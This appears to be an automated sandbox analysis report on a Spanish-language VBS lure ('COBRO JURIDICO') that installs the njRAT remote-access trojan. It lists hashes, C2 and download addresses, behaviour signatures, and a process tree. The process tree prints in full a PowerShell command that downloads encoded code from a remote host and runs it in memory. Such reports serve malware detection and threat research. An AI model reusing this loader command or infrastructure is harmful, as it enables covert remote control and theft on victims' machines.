Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
09/10/2022, 06:14
Static task
static1
Behavioral task
behavioral1
Sample
56325762828282 COBRO JURIDICO.vbs
Resource
win7-20220901-en
General
-
Target
56325762828282 COBRO JURIDICO.vbs
-
Size
437KB
-
MD5
3ae400fde403322cee0a88408828cba8
-
SHA1
7aac489534006c5de8080d639f29f9fdcc5a0079
-
SHA256
3b8b7f389603923a9fabf32a34ba6301ed3df38ee7eeaac068c8c108409b5532
-
SHA512
2c435502f2900ed9d45c340e35e3f41110e6dfd981c60898bf30a4d8e971435f80674b6073d05faf33fae6ef7a907c3e9908586051155ced341878c5dfbb6084
-
SSDEEP
48:kklC0eHz7/m7rJv4PsfbuUbNbbldPQ/Pe20NrFR4PLEvvldI:nl+/mrOeqUZldSPKNrY4vvldI
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Extracted
njrat
0.7NC
NYAN CAT
proyecto23.dnsdojo.org:2023
5b53b16e809d
-
reg_key
5b53b16e809d
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 2180 powershell.exe 6 2180 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2180 set thread context of 1552 2180 powershell.exe 86 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2180 powershell.exe 2180 powershell.exe 1504 powershell.exe 1504 powershell.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 2180 powershell.exe Token: SeDebugPrivilege 1504 powershell.exe Token: SeDebugPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe Token: 33 1552 cvtres.exe Token: SeIncBasePriorityPrivilege 1552 cvtres.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4832 wrote to memory of 2180 4832 WScript.exe 82 PID 4832 wrote to memory of 2180 4832 WScript.exe 82 PID 2180 wrote to memory of 1504 2180 powershell.exe 84 PID 2180 wrote to memory of 1504 2180 powershell.exe 84 PID 2180 wrote to memory of 1552 2180 powershell.exe 86 PID 2180 wrote to memory of 1552 2180 powershell.exe 86 PID 2180 wrote to memory of 1552 2180 powershell.exe 86 PID 2180 wrote to memory of 1552 2180 powershell.exe 86 PID 2180 wrote to memory of 1552 2180 powershell.exe 86 PID 2180 wrote to memory of 1552 2180 powershell.exe 86 PID 2180 wrote to memory of 1552 2180 powershell.exe 86 PID 2180 wrote to memory of 1552 2180 powershell.exe 86
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56325762828282 COBRO JURIDICO.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/YUskG/d/ee.etsap//:sptth'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD57ae41ba310b3e0f4fc4c6eff982554fd
SHA11a382df614c494ff947f88817b9f0fbc76de3a68
SHA25693939edea4456184f43eeffda4f6e82f125bf5cead24cebcf317aa3fe83efcce
SHA5128e13185cab71046bb411dae56ccaabd547d3bf961c200fc307f2961eb9caf175dd08631ecf6512578dd333dac3640e653f93115c840b3344648f2a597e789223